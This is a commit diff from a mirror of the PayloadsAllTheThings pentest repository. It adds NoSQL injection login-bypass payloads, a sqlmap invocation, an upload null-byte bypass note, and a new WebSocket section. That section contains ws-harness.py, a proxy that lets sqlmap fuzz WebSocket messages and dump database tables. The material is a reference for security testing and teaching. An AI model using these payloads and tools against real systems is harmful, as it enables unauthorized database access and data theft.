mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 22:33:00 +00:00
Web socket + title capitalization
This commit is contained in:
parent
ef65f36902
commit
ee334f981e
8 changed files with 118 additions and 4 deletions
|
@ -11,9 +11,10 @@ in URL
|
||||||
username[$ne]=toto&password[$ne]=toto
|
username[$ne]=toto&password[$ne]=toto
|
||||||
|
|
||||||
in JSON
|
in JSON
|
||||||
{"username": {"$ne": null}, "password": {"$ne": null} }
|
{"username": {"$ne": null}, "password": {"$ne": null}}
|
||||||
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
|
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
|
||||||
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
|
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
|
||||||
|
{"username": {"$gt":""}, "password": {"$gt":""}}
|
||||||
```
|
```
|
||||||
|
|
||||||
Extract length information
|
Extract length information
|
||||||
|
@ -40,6 +41,13 @@ in JSON
|
||||||
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
|
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Extract data with "in"
|
||||||
|
|
||||||
|
````json
|
||||||
|
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Blind NoSQL
|
## Blind NoSQL
|
||||||
|
|
||||||
```python
|
```python
|
||||||
|
|
|
@ -117,6 +117,12 @@ transformed into U+0027 APOSTROPHE (')
|
||||||
sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
|
sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Load a request file and use mobile user-agent
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1
|
||||||
|
```
|
||||||
|
|
||||||
### Custom injection in UserAgent/Header/Referer/Cookie
|
### Custom injection in UserAgent/Header/Referer/Cookie
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
|
|
@ -31,7 +31,7 @@ Double extensions
|
||||||
|
|
||||||
### Upload tricks
|
### Upload tricks
|
||||||
|
|
||||||
- Null byte (eg: shell.php%00.gif, shell.php%00.png)
|
- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
|
||||||
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
||||||
|
|
||||||
### Picture upload with LFI
|
### Picture upload with LFI
|
||||||
|
|
63
Web Sockets/Files/ws-harness.py
Normal file
63
Web Sockets/Files/ws-harness.py
Normal file
|
@ -0,0 +1,63 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
import socket,ssl
|
||||||
|
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
|
||||||
|
from websocket import create_connection, WebSocket
|
||||||
|
from urlparse import parse_qs
|
||||||
|
import argparse
|
||||||
|
import os
|
||||||
|
|
||||||
|
LOOP_BACK_PORT_NUMBER = 8000
|
||||||
|
|
||||||
|
def FuzzWebSocket(fuzz_value):
|
||||||
|
print fuzz_value
|
||||||
|
ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
|
||||||
|
result = ws.recv()
|
||||||
|
return result
|
||||||
|
|
||||||
|
def LoadMessage(file):
|
||||||
|
file_contents = ""
|
||||||
|
try:
|
||||||
|
if os.path.isfile(file):
|
||||||
|
f = open(file,'r')
|
||||||
|
file_contents = f.read()
|
||||||
|
f.close()
|
||||||
|
except:
|
||||||
|
print ("Error reading file: %s" % file)
|
||||||
|
exit()
|
||||||
|
return file_contents
|
||||||
|
|
||||||
|
class myWebServer(BaseHTTPRequestHandler):
|
||||||
|
|
||||||
|
#Handler for the GET requests
|
||||||
|
def do_GET(self):
|
||||||
|
qs = parse_qs(self.path[2:])
|
||||||
|
fuzz_value = qs['fuzz']
|
||||||
|
result = FuzzWebSocket(fuzz_value)
|
||||||
|
self.send_response(200)
|
||||||
|
self.send_header('Content-type','text/html')
|
||||||
|
self.end_headers()
|
||||||
|
self.wfile.write(result)
|
||||||
|
return
|
||||||
|
|
||||||
|
parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
|
||||||
|
parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True)
|
||||||
|
parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True)
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
ws_message = LoadMessage(args.message)
|
||||||
|
|
||||||
|
ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080)
|
||||||
|
|
||||||
|
try:
|
||||||
|
#Create a web server and define the handler to manage the
|
||||||
|
#incoming request
|
||||||
|
server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
|
||||||
|
print 'Started httpserver on port ' , LOOP_BACK_PORT_NUMBER
|
||||||
|
|
||||||
|
#Wait forever for incoming http requests
|
||||||
|
server.serve_forever()
|
||||||
|
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
print '^C received, shutting down the web server'
|
||||||
|
server.socket.close()
|
||||||
|
ws.close()
|
BIN
Web Sockets/Images/WebsocketHarness.jpg
Normal file
BIN
Web Sockets/Images/WebsocketHarness.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 82 KiB |
BIN
Web Sockets/Images/sqlmap.png
Normal file
BIN
Web Sockets/Images/sqlmap.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 93 KiB |
BIN
Web Sockets/Images/websocket-harness-start.png
Normal file
BIN
Web Sockets/Images/websocket-harness-start.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 18 KiB |
37
Web Sockets/README.md
Normal file
37
Web Sockets/README.md
Normal file
|
@ -0,0 +1,37 @@
|
||||||
|
# Web Sockets Attacks
|
||||||
|
|
||||||
|
> The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
|
||||||
|
|
||||||
|
Tools:
|
||||||
|
|
||||||
|
- [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Using ws-harness.py](#using-ws-harness-py)
|
||||||
|
|
||||||
|
## Using ws-harness.py
|
||||||
|
|
||||||
|
Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
The content of the message should contains the **[FUZZ]** keyword.
|
||||||
|
|
||||||
|
```json
|
||||||
|
{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
|
||||||
|
```
|
||||||
|
|
||||||
|
Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
|
||||||
|
|
||||||
|
```python
|
||||||
|
sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
|
||||||
|
- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
|
Loading…
Reference in a new issue